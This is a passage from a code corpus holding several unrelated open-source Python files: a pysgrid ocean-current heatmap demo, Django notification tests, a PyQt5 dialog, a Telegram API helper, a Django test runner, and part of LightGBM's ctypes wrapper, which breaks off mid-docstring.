from __future__ import (absolute_import, division, print_function)
from netCDF4 import Dataset
import numpy as np
import pysgrid
import matplotlib.pyplot as plt
import cartopy.crs as ccrs
# from cartopy.io import shapereader
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
# rotation is still ugly...
from pysgrid.processing_2d import rotate_vectors, vector_sum
# url = ('http://geoport.whoi.edu/thredds/dodsC/clay/usgs/users/jcwarner/Projects/Sandy/triple_nest/00_dir_NYB05.ncml') # noqa
url2 = ('http://geoport-dev.whoi.edu/thredds/dodsC/clay/usgs/users/zdefne/run076/his/00_dir_roms_display.ncml') # noqa
nc = Dataset(url2)
sgrid = pysgrid.load_grid(nc)
sgrid # We need a better __repr__ and __str__ !!!
lons, lats = np.mgrid[-74.38:-74.26:600j, 39.45:39.56:600j]
points = np.stack((lons, lats), axis=-1)
print(points.shape)
time_idx = 0
v_idx = 0
interp_u = sgrid.interpolate_var_to_points(
points, sgrid.u[time_idx, v_idx], slices=None)
interp_v = sgrid.interpolate_var_to_points(
points, sgrid.v, slices=[time_idx, v_idx])
ind = sgrid.locate_faces(points)
ang_ind = ind + [1, 1]
angles = sgrid.angles[:][ang_ind[:, 0], ang_ind[:, 1]]
u_rot, v_rot = rotate_vectors(interp_u, interp_v, angles)
u_rot = u_rot.reshape(600, -1)
v_rot = v_rot.reshape(600, -1)
uv_vector_sum = vector_sum(u_rot, v_rot)
def make_map(projection=ccrs.PlateCarree(), figsize=(20, 20)):
fig, ax = plt.subplots(figsize=figsize,
subplot_kw=dict(projection=projection))
gl = ax.gridlines(draw_labels=True)
gl.xlabels_top = gl.ylabels_right = False
gl.xformatter = LONGITUDE_FORMATTER
gl.yformatter = LATITUDE_FORMATTER
return fig, ax
mscale = 1
vscale = 10
scale = 0.03
lon_data = lons
lat_data = lats
fig, ax = make_map()
kw = dict(scale=1.0 / scale, pivot='middle', width=0.003, color='black')
cs = plt.pcolormesh(lon_data[::mscale, ::mscale],
lat_data[::mscale, ::mscale],
uv_vector_sum[::mscale, ::mscale], zorder=1, cmap=plt.cm.rainbow)
ax.coastlines('10m')
plt.show()
| ayan-usgs/pysgrid | demos/inlet_heatmap.py | Python | bsd-3-clause | 2,094 |
# Copyright (c) 2009 Participatory Culture Foundation
# See LICENSE for details.
from django.http import HttpResponse
from channelguide.testframework import TestCase
class NotificationViewTestCase(TestCase):
def test_add_notification(self):
"""
Test that notifications are added when request.add_notification() is called.
"""
request = self.process_request()
request.add_notification('title', 'body')
request.add_notification(None, 'None body')
self.assertEquals(request.notifications,
[('title', 'body'),
(None, 'None body')])
def test_display_notifications(self):
"""
Test that notifications are displayed when they're added.
"""
request = self.process_request()
request.add_notification('title', 'body')
request.add_notification(None, 'None body')
response = HttpResponse('<!-- NOTIFICATION BAR -->')
self.process_response_middleware(request, response)
self.assertTrue('title' in response.content)
self.assertTrue('body' in response.content)
self.assertTrue('None body' in response.content)
def test_notifications_from_session(self):
"""
If there is a 'notifications' key in the session, its notifications
should be added to those added by the view on the next load.
"""
request = self.process_request()
request.session['notifications'] = [('session title', 'session body')]
response = HttpResponse('<!-- NOTIFICATION BAR -->')
self.process_response_middleware(request, response)
self.assertFalse('session' in response.content)
cookies = response.cookies
request = self.process_request(cookies) # next request should show the
# notification
response = HttpResponse('<!-- NOTIFICATION BAR -->')
self.process_response_middleware(request, response)
self.assertTrue('session title' in response.content)
self.assertTrue('session body' in response.content)
request = self.process_request(cookies) # third request shouldn't show
# the notification
response = HttpResponse('<!-- NOTIFICATION BAR -->')
self.process_response_middleware(request, response)
self.assertFalse('session title' in response.content)
| kmshi/miroguide | channelguide/notifications/tests.py | Python | agpl-3.0 | 2,468 |
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.uic import *
class MyOverlayDlg (QDialog) :
secondFlag = False
infile = ""
def __init__(self) :
QDialog.__init__(self)
self.ui = loadUi("uiPlotOverlayDlg.ui", self)
self.ui.overlayBrowseButton.clicked.connect (self.browseFile)
def setParams (self, infl, sflag) :
self.ui.useSecondAxisCB.setChecked (sflag)
self.ui.overlayFileLE.setText(infl)
def accept (self) :
str = self.ui.overlayFileLE.text ()
self.infile = str.toLatin1().data()
secondFlag = self.ui.useSecondAxisCB.isChecked()
QDialog.accept(self)
def browseFile (self) :
str = QFileDialog.getOpenFileName (self, "Overlay XY ASCII File", self.infile, "Text Files (*.txt *.*)")
self.overlayFileLE.setText (str)
| comptech/atrex | Software/MyOverlayDlg.py | Python | lgpl-3.0 | 880 |
'''
TelegramAPy
Copyright (C) 2015 Giove Andrea
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
'''
import json
class ReplayKeyboardHide:
FIELD_HIDEKEYBOARD = 'hide_keyboard'
FIELD_SELECTIVE = 'selective'
def __init__(self, hide_keyboard, selective=None):
self.hide_keyboard = hide_keyboard
self.selective = selective
def encode(self):
out = {ReplayKeyboardHide.FIELD_HIDEKEYBOARD: self.hide_keyboard}
if self.selective:
out[ReplayKeyboardHide.FIELD_SELECTIVE] = self.selective
return json.dumps(out)
| aadeg/TelegramAPy | telegramapy/types/replaykeyboardhide.py | Python | gpl-2.0 | 1,208 |
#!/usr/bin/env python
"""
This script is a trick to setup a fake Django environment, since this reusable
app will be developed and tested outside any specifiv Django project.
Via ``settings.configure`` you will be able to set all necessary settings
for your app and run the tests as if you were calling ``./manage.py test``.
Taken from https://github.com/mbrochh/tdd-with-django-reusable-app
"""
import os
import sys
from django.conf import settings
EXTERNAL_APPS = [
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.staticfiles',
'django.contrib.sitemaps',
'django.contrib.sites',
]
INTERNAL_APPS = [
'portlet',
'django_nose',
]
INSTALLED_APPS = EXTERNAL_APPS + INTERNAL_APPS
COVERAGE_MODULE_EXCLUDES = [
'tests$', 'settings$', 'urls$', 'locale$',
'migrations', 'fixtures', 'admin$', 'django_extensions',
]
COVERAGE_MODULE_EXCLUDES += EXTERNAL_APPS
if not settings.configured:
settings.configure(
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": ":memory:",
}
},
INSTALLED_APPS=INSTALLED_APPS,
ROOT_URLCONF='portlet.urls',
TEMPLATE_DIRS=(
os.path.join(os.path.dirname(__file__), '../templates'),
),
COVERAGE_MODULE_EXCLUDES=COVERAGE_MODULE_EXCLUDES,
COVERAGE_REPORT_HTML_OUTPUT_DIR=os.path.join(
os.path.dirname(__file__), 'coverage')
)
from django_coverage.coverage_runner import CoverageRunner
from django_nose import NoseTestSuiteRunner
class NoseCoverageTestRunner(CoverageRunner, NoseTestSuiteRunner):
"""Custom test runner that uses nose and coverage"""
pass
def runtests(*test_args):
failures = NoseTestSuiteRunner(verbosity=2, interactive=True).run_tests(test_args)
sys.exit(failures)
if __name__ == '__main__':
runtests(*sys.argv[1:])
| uhuramedia/django-portlet | portlet/tests/runtests.py | Python | bsd-3-clause | 2,032 |
# coding: utf-8
# pylint: disable = invalid-name, C0111, C0301
# pylint: disable = R0912, R0913, R0914, W0105, W0201, W0212
"""Wrapper c_api of LightGBM"""
from __future__ import absolute_import
import ctypes
import os
import warnings
from tempfile import NamedTemporaryFile
import numpy as np
import scipy.sparse
from .compat import (DataFrame, Series, integer_types, json,
json_default_with_numpy, numeric_types, range_,
string_type)
from .libpath import find_lib_path
def _load_lib():
"""Load LightGBM Library."""
lib_path = find_lib_path()
if len(lib_path) == 0:
raise Exception("cannot find LightGBM library")
lib = ctypes.cdll.LoadLibrary(lib_path[0])
lib.LGBM_GetLastError.restype = ctypes.c_char_p
return lib
_LIB = _load_lib()
class LightGBMError(Exception):
"""Error throwed by LightGBM"""
pass
def _safe_call(ret):
"""Check the return value of C API call
Parameters
----------
ret : int
return value from API calls
"""
if ret != 0:
raise LightGBMError(_LIB.LGBM_GetLastError())
def is_numeric(obj):
"""Check is a number or not, include numpy number etc."""
try:
float(obj)
return True
except (TypeError, ValueError):
# TypeError: obj is not a string or a number
# ValueError: invalid literal
return False
def is_numpy_1d_array(data):
"""Check is 1d numpy array"""
return isinstance(data, np.ndarray) and len(data.shape) == 1
def is_1d_list(data):
"""Check is 1d list"""
return isinstance(data, list) and \
(not data or isinstance(data[0], numeric_types))
def list_to_1d_numpy(data, dtype=np.float32, name='list'):
"""convert to 1d numpy array"""
if is_numpy_1d_array(data):
if data.dtype == dtype:
return data
else:
return data.astype(dtype=dtype, copy=False)
elif is_1d_list(data):
return np.array(data, dtype=dtype, copy=False)
elif isinstance(data, Series):
return data.values.astype(dtype)
else:
raise TypeError("Wrong type({}) for {}, should be list or numpy array".format(type(data).__name__, name))
def cfloat32_array_to_numpy(cptr, length):
"""Convert a ctypes float pointer array to a numpy array.
"""
if isinstance(cptr, ctypes.POINTER(ctypes.c_float)):
return np.fromiter(cptr, dtype=np.float32, count=length)
else:
raise RuntimeError('Expected float pointer')
def cfloat64_array_to_numpy(cptr, length):
"""Convert a ctypes double pointer array to a numpy array.
"""
if isinstance(cptr, ctypes.POINTER(ctypes.c_double)):
return np.fromiter(cptr, dtype=np.float64, count=length)
else:
raise RuntimeError('Expected double pointer')
def cint32_array_to_numpy(cptr, length):
"""Convert a ctypes float pointer array to a numpy array.
"""
if isinstance(cptr, ctypes.POINTER(ctypes.c_int32)):
return np.fromiter(cptr, dtype=np.int32, count=length)
else:
raise RuntimeError('Expected int pointer')
def c_str(string):
"""Convert a python string to cstring."""
return ctypes.c_char_p(string.encode('utf-8'))
def c_array(ctype, values):
"""Convert a python array to c array."""
return (ctype * len(values))(*values)
def param_dict_to_str(data):
if data is None or not data:
return ""
pairs = []
for key, val in data.items():
if isinstance(val, (list, tuple, set)) or is_numpy_1d_array(val):
pairs.append(str(key) + '=' + ','.join(map(str, val)))
elif isinstance(val, string_type) or isinstance(val, numeric_types) or is_numeric(val):
pairs.append(str(key) + '=' + str(val))
else:
raise TypeError('Unknown type of parameter:%s, got:%s'
% (key, type(val).__name__))
return ' '.join(pairs)
class _temp_file(object):
def __enter__(self):
with NamedTemporaryFile(prefix="lightgbm_tmp_", delete=True) as f:
self.name = f.name
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if os.path.isfile(self.name):
os.remove(self.name)
def readlines(self):
with open(self.name, "r+") as f:
ret = f.readlines()
return ret
def writelines(self, lines):
with open(self.name, "w+") as f:
f.writelines(lines)
"""marco definition of data type in c_api of LightGBM"""
C_API_DTYPE_FLOAT32 = 0
C_API_DTYPE_FLOAT64 = 1
C_API_DTYPE_INT32 = 2
C_API_DTYPE_INT64 = 3
"""Matric is row major in python"""
C_API_IS_ROW_MAJOR = 1
"""marco definition of prediction type in c_api of LightGBM"""
C_API_PREDICT_NORMAL = 0
C_API_PREDICT_RAW_SCORE = 1
C_API_PREDICT_LEAF_INDEX = 2
"""data type of data field"""
FIELD_TYPE_MAPPER = {"label": C_API_DTYPE_FLOAT32,
"weight": C_API_DTYPE_FLOAT32,
"init_score": C_API_DTYPE_FLOAT64,
"group": C_API_DTYPE_INT32}
def c_float_array(data):
"""get pointer of float numpy array / list"""
if is_1d_list(data):
data = np.array(data, copy=False)
if is_numpy_1d_array(data):
if data.dtype == np.float32:
ptr_data = data.ctypes.data_as(ctypes.POINTER(ctypes.c_float))
type_data = C_API_DTYPE_FLOAT32
elif data.dtype == np.float64:
ptr_data = data.ctypes.data_as(ctypes.POINTER(ctypes.c_double))
type_data = C_API_DTYPE_FLOAT64
else:
raise TypeError("Expected np.float32 or np.float64, met type({})"
.format(data.dtype))
else:
raise TypeError("Unknown type({})".format(type(data).__name__))
return (ptr_data, type_data)
def c_int_array(data):
"""get pointer of int numpy array / list"""
if is_1d_list(data):
data = np.array(data, copy=False)
if is_numpy_1d_array(data):
if data.dtype == np.int32:
ptr_data = data.ctypes.data_as(ctypes.POINTER(ctypes.c_int32))
type_data = C_API_DTYPE_INT32
elif data.dtype == np.int64:
ptr_data = data.ctypes.data_as(ctypes.POINTER(ctypes.c_int64))
type_data = C_API_DTYPE_INT64
else:
raise TypeError("Expected np.int32 or np.int64, met type({})"
.format(data.dtype))
else:
raise TypeError("Unknown type({})".format(type(data).__name__))
return (ptr_data, type_data)
PANDAS_DTYPE_MAPPER = {'int8': 'int', 'int16': 'int', 'int32': 'int',
'int64': 'int', 'uint8': 'int', 'uint16': 'int',
'uint32': 'int', 'uint64': 'int', 'float16': 'float',
'float32': 'float', 'float64': 'float', 'bool': 'int'}
def _data_from_pandas(data, feature_name, categorical_feature, pandas_categorical):
if isinstance(data, DataFrame):
if feature_name == 'auto' or feature_name is None:
if all([isinstance(name, integer_types + (np.integer, )) for name in data.columns]):
msg = """Using Pandas (default) integer column names, not column indexes. You can use indexes with DataFrame.values."""
warnings.filterwarnings('once')
warnings.warn(msg, stacklevel=5)
data = data.rename(columns=str)
cat_cols = data.select_dtypes(include=['category']).columns
if pandas_categorical is None: # train dataset
pandas_categorical = [list(data[col].cat.categories) for col in cat_cols]
else:
if len(cat_cols) != len(pandas_categorical):
raise ValueError('train and valid dataset categorical_feature do not match.')
for col, category in zip(cat_cols, pandas_categorical):
if list(data[col].cat.categories) != list(category):
data[col] = data[col].cat.set_categories(category)
if len(cat_cols): # cat_cols is pandas Index object
data = data.copy() # not alter origin DataFrame
data[cat_cols] = data[cat_cols].apply(lambda x: x.cat.codes)
if categorical_feature is not None:
if feature_name is None:
feature_name = list(data.columns)
if categorical_feature == 'auto':
categorical_feature = list(cat_cols)
else:
categorical_feature = list(categorical_feature) + list(cat_cols)
if feature_name == 'auto':
feature_name = list(data.columns)
data_dtypes = data.dtypes
if not all(dtype.name in PANDAS_DTYPE_MAPPER for dtype in data_dtypes):
bad_fields = [data.columns[i] for i, dtype in
enumerate(data_dtypes) if dtype.name not in PANDAS_DTYPE_MAPPER]
msg = """DataFrame.dtypes for data must be int, float or bool. Did not expect the data types in fields """
raise ValueError(msg + ', '.join(bad_fields))
data = data.values.astype('float')
else:
if feature_name == 'auto':
feature_name = None
if categorical_feature == 'auto':
categorical_feature = None
return data, feature_name, categorical_feature, pandas_categorical
def _label_from_pandas(label):
if isinstance(label, DataFrame):
if len(label.columns) > 1:
raise ValueError('DataFrame for label cannot have multiple columns')
label_dtypes = label.dtypes
if not all(dtype.name in PANDAS_DTYPE_MAPPER for dtype in label_dtypes):
raise ValueError('DataFrame.dtypes for label must be int, float or bool')
label = label.values.astype('float')
return label
def _save_pandas_categorical(file_name, pandas_categorical):
with open(file_name, 'a') as f:
f.write('\npandas_categorical:' + json.dumps(pandas_categorical, default=json_default_with_numpy))
def _load_pandas_categorical(file_name):
with open(file_name, 'r') as f:
last_line = f.readlines()[-1]
if last_line.startswith('pandas_categorical:'):
return json.loads(last_line[len('pandas_categorical:'):])
return None
class _InnerPredictor(object):
"""
A _InnerPredictor of LightGBM.
Only used for prediction, usually used for continued-train
Note: Can convert from Booster, but cannot convert to Booster
"""
def __init__(self, model_file=None, booster_handle=None):
"""Initialize the _InnerPredictor. Not expose to user
Parameters
----------
model_file : string
Path to the model file.
booster_handle : Handle of Booster
use handle to init
"""
self.handle = ctypes.c_void_p()
self.__is_manage_handle = True
if model_file is not None:
"""Prediction task"""
out_num_iterations = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterCreateFromModelfile(
c_str(model_file),
ctypes.byref(out_num_iterations),
ctypes.byref(self.handle)))
out_num_class = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetNumClasses(
self.handle,
ctypes.byref(out_num_class)))
self.num_class = out_num_class.value
self.num_total_iteration = out_num_iterations.value
self.pandas_categorical = _load_pandas_categorical(model_file)
elif booster_handle is not None:
self.__is_manage_handle = False
self.handle = booster_handle
out_num_class = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetNumClasses(
self.handle,
ctypes.byref(out_num_class)))
self.num_class = out_num_class.value
out_num_iterations = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetCurrentIteration(
self.handle,
ctypes.byref(out_num_iterations)))
self.num_total_iteration = out_num_iterations.value
self.pandas_categorical = None
else:
raise TypeError('Need Model file or Booster handle to create a predictor')
def __del__(self):
if self.__is_manage_handle:
_safe_call(_LIB.LGBM_BoosterFree(self.handle))
def predict(self, data, num_iteration=-1,
raw_score=False, pred_leaf=False, data_has_header=False,
is_reshape=True):
"""
Predict logic
Parameters
----------
data : string/numpy array/scipy.sparse
Data source for prediction
When data type is string, it represents the path of txt file
num_iteration : int
Used iteration for prediction
raw_score : bool
True for predict raw score
pred_leaf : bool
True for predict leaf index
data_has_header : bool
Used for txt data, True if txt data has header
is_reshape : bool
Reshape to (nrow, ncol) if true
Returns
-------
Prediction result
"""
if isinstance(data, Dataset):
raise TypeError("Cannot use Dataset instance for prediction, please use raw data instead")
data = _data_from_pandas(data, None, None, self.pandas_categorical)[0]
predict_type = C_API_PREDICT_NORMAL
if raw_score:
predict_type = C_API_PREDICT_RAW_SCORE
if pred_leaf:
predict_type = C_API_PREDICT_LEAF_INDEX
int_data_has_header = 1 if data_has_header else 0
if num_iteration > self.num_total_iteration:
num_iteration = self.num_total_iteration
if isinstance(data, string_type):
with _temp_file() as f:
_safe_call(_LIB.LGBM_BoosterPredictForFile(
self.handle,
c_str(data),
ctypes.c_int(int_data_has_header),
ctypes.c_int(predict_type),
ctypes.c_int(num_iteration),
c_str(f.name)))
lines = f.readlines()
nrow = len(lines)
preds = [float(token) for line in lines for token in line.split('\t')]
preds = np.array(preds, dtype=np.float64, copy=False)
elif isinstance(data, scipy.sparse.csr_matrix):
preds, nrow = self.__pred_for_csr(data, num_iteration,
predict_type)
elif isinstance(data, scipy.sparse.csc_matrix):
preds, nrow = self.__pred_for_csc(data, num_iteration,
predict_type)
elif isinstance(data, np.ndarray):
preds, nrow = self.__pred_for_np2d(data, num_iteration,
predict_type)
elif isinstance(data, DataFrame):
preds, nrow = self.__pred_for_np2d(data.values, num_iteration,
predict_type)
else:
try:
csr = scipy.sparse.csr_matrix(data)
preds, nrow = self.__pred_for_csr(csr, num_iteration,
predict_type)
except:
raise TypeError('Cannot predict data for type {}'.format(type(data).__name__))
if pred_leaf:
preds = preds.astype(np.int32)
if is_reshape and preds.size != nrow:
if preds.size % nrow == 0:
preds = preds.reshape(nrow, -1)
else:
raise ValueError('Length of predict result (%d) cannot be divide nrow (%d)'
% (preds.size, nrow))
return preds
def __get_num_preds(self, num_iteration, nrow, predict_type):
"""
Get size of prediction result
"""
n_preds = ctypes.c_int64(0)
_safe_call(_LIB.LGBM_BoosterCalcNumPredict(
self.handle,
ctypes.c_int(nrow),
ctypes.c_int(predict_type),
ctypes.c_int(num_iteration),
ctypes.byref(n_preds)))
return n_preds.value
def __pred_for_np2d(self, mat, num_iteration, predict_type):
"""
Predict for a 2-D numpy matrix.
"""
if len(mat.shape) != 2:
raise ValueError('Input numpy.ndarray must be 2 dimensional')
if mat.dtype == np.float32 or mat.dtype == np.float64:
data = np.array(mat.reshape(mat.size), dtype=mat.dtype, copy=False)
else:
"""change non-float data to float data, need to copy"""
data = np.array(mat.reshape(mat.size), dtype=np.float32)
ptr_data, type_ptr_data = c_float_array(data)
n_preds = self.__get_num_preds(num_iteration, mat.shape[0],
predict_type)
preds = np.zeros(n_preds, dtype=np.float64)
out_num_preds = ctypes.c_int64(0)
_safe_call(_LIB.LGBM_BoosterPredictForMat(
self.handle,
ptr_data,
ctypes.c_int(type_ptr_data),
ctypes.c_int(mat.shape[0]),
ctypes.c_int(mat.shape[1]),
ctypes.c_int(C_API_IS_ROW_MAJOR),
ctypes.c_int(predict_type),
ctypes.c_int(num_iteration),
ctypes.byref(out_num_preds),
preds.ctypes.data_as(ctypes.POINTER(ctypes.c_double))))
if n_preds != out_num_preds.value:
raise ValueError("Wrong length for predict results")
return preds, mat.shape[0]
def __pred_for_csr(self, csr, num_iteration, predict_type):
"""
Predict for a csr data
"""
nrow = len(csr.indptr) - 1
n_preds = self.__get_num_preds(num_iteration, nrow, predict_type)
preds = np.zeros(n_preds, dtype=np.float64)
out_num_preds = ctypes.c_int64(0)
ptr_indptr, type_ptr_indptr = c_int_array(csr.indptr)
ptr_data, type_ptr_data = c_float_array(csr.data)
_safe_call(_LIB.LGBM_BoosterPredictForCSR(
self.handle,
ptr_indptr,
ctypes.c_int32(type_ptr_indptr),
csr.indices.ctypes.data_as(ctypes.POINTER(ctypes.c_int32)),
ptr_data,
ctypes.c_int(type_ptr_data),
ctypes.c_int64(len(csr.indptr)),
ctypes.c_int64(len(csr.data)),
ctypes.c_int64(csr.shape[1]),
ctypes.c_int(predict_type),
ctypes.c_int(num_iteration),
ctypes.byref(out_num_preds),
preds.ctypes.data_as(ctypes.POINTER(ctypes.c_double))))
if n_preds != out_num_preds.value:
raise ValueError("Wrong length for predict results")
return preds, nrow
def __pred_for_csc(self, csc, num_iteration, predict_type):
"""
Predict for a csc data
"""
nrow = csc.shape[0]
n_preds = self.__get_num_preds(num_iteration, nrow, predict_type)
preds = np.zeros(n_preds, dtype=np.float64)
out_num_preds = ctypes.c_int64(0)
ptr_indptr, type_ptr_indptr = c_int_array(csc.indptr)
ptr_data, type_ptr_data = c_float_array(csc.data)
_safe_call(_LIB.LGBM_BoosterPredictForCSC(
self.handle,
ptr_indptr,
ctypes.c_int32(type_ptr_indptr),
csc.indices.ctypes.data_as(ctypes.POINTER(ctypes.c_int32)),
ptr_data,
ctypes.c_int(type_ptr_data),
ctypes.c_int64(len(csc.indptr)),
ctypes.c_int64(len(csc.data)),
ctypes.c_int64(csc.shape[0]),
ctypes.c_int(predict_type),
ctypes.c_int(num_iteration),
ctypes.byref(out_num_preds),
preds.ctypes.data_as(ctypes.POINTER(ctypes.c_double))))
if n_preds != out_num_preds.value:
raise ValueError("Wrong length for predict results")
return preds, nrow
class Dataset(object):
"""Dataset in LightGBM."""
def __init__(self, data, label=None, max_bin=255, reference=None,
weight=None, group=None, silent=False,
feature_name='auto', categorical_feature='auto', params=None,
free_raw_data=True):
"""
Parameters
----------
data : string/numpy array/scipy.sparse
Data source of Dataset.
When data type is string, it represents the path of txt file
label : list or numpy 1-D array, optional
Label of the data
max_bin : int, required
Max number of discrete bin for features
reference : Other Dataset, optional
If this dataset validation, need to use training data as reference
weight : list or numpy 1-D array , optional
Weight for each instance.
group : list or numpy 1-D array , optional
Group/query size for dataset
silent : boolean, optional
Whether print messages during construction
feature_name : list of str, or 'auto'
Feature names
If 'auto' and data is pandas DataFrame, use data columns name
categorical_feature : list of str or int, or 'auto'
Categorical features,
type int represents index,
type str represents feature names (need to specify feature_name as well)
If 'auto' and data is pandas DataFrame, use pandas categorical columns
params: dict, optional
Other parameters
free_raw_data: Bool
True if need to free raw data after construct inner dataset
"""
self.handle = None
self.data = data
self.label = label
self.max_bin = max_bin
self.reference = reference
self.weight = weight
self.group = group
self.silent = silent
self.feature_name = feature_name
self.categorical_feature = categorical_feature
self.params = params
self.free_raw_data = free_raw_data
self.used_indices = None
self._predictor = None
self.pandas_categorical = None
def __del__(self):
self._free_handle()
def _free_handle(self):
if self.handle is not None:
_safe_call(_LIB.LGBM_DatasetFree(self.handle))
self.handle = None
def _lazy_init(self, data, label=None, max_bin=255, reference=None,
weight=None, group=None, predictor=None,
silent=False, feature_name='auto',
categorical_feature='auto', params=None):
if data is None:
self.handle = None
return
data, feature_name, categorical_feature, self.pandas_categorical = _data_from_pandas(data, feature_name, categorical_feature, self.pandas_categorical)
label = _label_from_pandas(label)
self.data_has_header = False
"""process for args"""
params = {} if params is None else params
self.max_bin = max_bin
self.predictor = predictor
params["max_bin"] = max_bin
if silent:
params["verbose"] = 0
elif "verbose" not in params:
params["verbose"] = 1
"""get categorical features"""
if categorical_feature is not None:
categorical_indices = set()
feature_dict = {}
if feature_name is not None:
feature_dict = {name: i for i, name in enumerate(feature_name)}
for name in categorical_feature:
if isinstance(name, string_type) and name in feature_dict:
categorical_indices.add(feature_dict[name])
elif isinstance(name, integer_types):
categorical_indices.add(name)
else:
raise TypeError("Wrong type({}) or unknown name({}) in categorical_feature"
.format(type(name).__name__, name))
params['categorical_column'] = sorted(categorical_indices)
params_str = param_dict_to_str(params)
"""process for reference dataset"""
ref_dataset = None
if isinstance(reference, Dataset):
ref_dataset = reference.construct().handle
elif reference is not None:
raise TypeError('Reference dataset should be None or dataset instance')
"""start construct data"""
if isinstance(data, string_type):
"""check data has header or not"""
if str(params.get("has_header", "")).lower() == "true" \
or str(params.get("header", "")).lower() == "true":
self.data_has_header = True
self.handle = ctypes.c_void_p()
_safe_call(_LIB.LGBM_DatasetCreateFromFile(
c_str(data),
c_str(params_str),
ref_dataset,
ctypes.byref(self.handle)))
elif isinstance(data, scipy.sparse.csr_matrix):
self.__init_from_csr(data, params_str, ref_dataset)
elif isinstance(data, scipy.sparse.csc_matrix):
self.__init_from_csc(data, params_str, ref_dataset)
elif isinstance(data, np.ndarray):
self.__init_from_np2d(data, params_str, ref_dataset)
else:
try:
csr = scipy.sparse.csr_matrix(data)
self.__init_from_csr(csr, params_str, ref_dataset)
except:
raise TypeError('Cannot initialize Dataset from {}'.format(type(data).__name__))
if label is not None:
self.set_label(label)
if self.get_label() is None:
raise ValueError("Label should not be None")
if weight is not None:
self.set_weight(weight)
if group is not None:
self.set_group(group)
# load init score
if isinstance(self.predictor, _InnerPredictor):
init_score = self.predictor.predict(data,
raw_score=True,
data_has_header=self.data_has_header,
is_reshape=False)
if self.predictor.num_class > 1:
# need re group init score
new_init_score = np.zeros(init_score.size, dtype=np.float32)
num_data = self.num_data()
for i in range_(num_data):
for j in range_(self.predictor.num_class):
new_init_score[j * num_data + i] = init_score[i * self.predictor.num_class + j]
init_score = new_init_score
self.set_init_score(init_score)
elif self.predictor is not None:
raise TypeError('wrong predictor type {}'.format(type(self.predictor).__name__))
# set feature names
self.set_feature_name(feature_name)
def __init_from_np2d(self, mat, params_str, ref_dataset):
"""
Initialize data from a 2-D numpy matrix.
"""
if len(mat.shape) != 2:
raise ValueError('Input numpy.ndarray must be 2 dimensional')
self.handle = ctypes.c_void_p()
if mat.dtype == np.float32 or mat.dtype == np.float64:
data = np.array(mat.reshape(mat.size), dtype=mat.dtype, copy=False)
else:
"""change non-float data to float data, need to copy"""
data = np.array(mat.reshape(mat.size), dtype=np.float32)
ptr_data, type_ptr_data = c_float_array(data)
_safe_call(_LIB.LGBM_DatasetCreateFromMat(
ptr_data,
ctypes.c_int(type_ptr_data),
ctypes.c_int(mat.shape[0]),
ctypes.c_int(mat.shape[1]),
ctypes.c_int(C_API_IS_ROW_MAJOR),
c_str(params_str),
ref_dataset,
ctypes.byref(self.handle)))
def __init_from_csr(self, csr, params_str, ref_dataset):
"""
Initialize data from a CSR matrix.
"""
if len(csr.indices) != len(csr.data):
raise ValueError('Length mismatch: {} vs {}'.format(len(csr.indices), len(csr.data)))
self.handle = ctypes.c_void_p()
ptr_indptr, type_ptr_indptr = c_int_array(csr.indptr)
ptr_data, type_ptr_data = c_float_array(csr.data)
_safe_call(_LIB.LGBM_DatasetCreateFromCSR(
ptr_indptr,
ctypes.c_int(type_ptr_indptr),
csr.indices.ctypes.data_as(ctypes.POINTER(ctypes.c_int32)),
ptr_data,
ctypes.c_int(type_ptr_data),
ctypes.c_int64(len(csr.indptr)),
ctypes.c_int64(len(csr.data)),
ctypes.c_int64(csr.shape[1]),
c_str(params_str),
ref_dataset,
ctypes.byref(self.handle)))
def __init_from_csc(self, csc, params_str, ref_dataset):
"""
Initialize data from a csc matrix.
"""
if len(csc.indices) != len(csc.data):
raise ValueError('Length mismatch: {} vs {}'.format(len(csc.indices), len(csc.data)))
self.handle = ctypes.c_void_p()
ptr_indptr, type_ptr_indptr = c_int_array(csc.indptr)
ptr_data, type_ptr_data = c_float_array(csc.data)
_safe_call(_LIB.LGBM_DatasetCreateFromCSC(
ptr_indptr,
ctypes.c_int(type_ptr_indptr),
csc.indices.ctypes.data_as(ctypes.POINTER(ctypes.c_int32)),
ptr_data,
ctypes.c_int(type_ptr_data),
ctypes.c_int64(len(csc.indptr)),
ctypes.c_int64(len(csc.data)),
ctypes.c_int64(csc.shape[0]),
c_str(params_str),
ref_dataset,
ctypes.byref(self.handle)))
def construct(self):
"""Lazy init"""
if self.handle is None:
if self.reference is not None:
if self.used_indices is None:
"""create valid"""
self._lazy_init(self.data, label=self.label, max_bin=self.max_bin, reference=self.reference,
weight=self.weight, group=self.group, predictor=self._predictor,
silent=self.silent, params=self.params)
else:
"""construct subset"""
used_indices = list_to_1d_numpy(self.used_indices, np.int32, name='used_indices')
self.handle = ctypes.c_void_p()
params_str = param_dict_to_str(self.params)
_safe_call(_LIB.LGBM_DatasetGetSubset(
self.reference.construct().handle,
used_indices.ctypes.data_as(ctypes.POINTER(ctypes.c_int32)),
ctypes.c_int(used_indices.shape[0]),
c_str(params_str),
ctypes.byref(self.handle)))
if self.get_label() is None:
raise ValueError("Label should not be None.")
else:
"""create train"""
self._lazy_init(self.data, label=self.label, max_bin=self.max_bin,
weight=self.weight, group=self.group, predictor=self._predictor,
silent=self.silent, feature_name=self.feature_name,
categorical_feature=self.categorical_feature, params=self.params)
if self.free_raw_data:
self.data = None
return self
def create_valid(self, data, label=None, weight=None, group=None,
silent=False, params=None):
"""
Create validation data align with current dataset
Parameters
----------
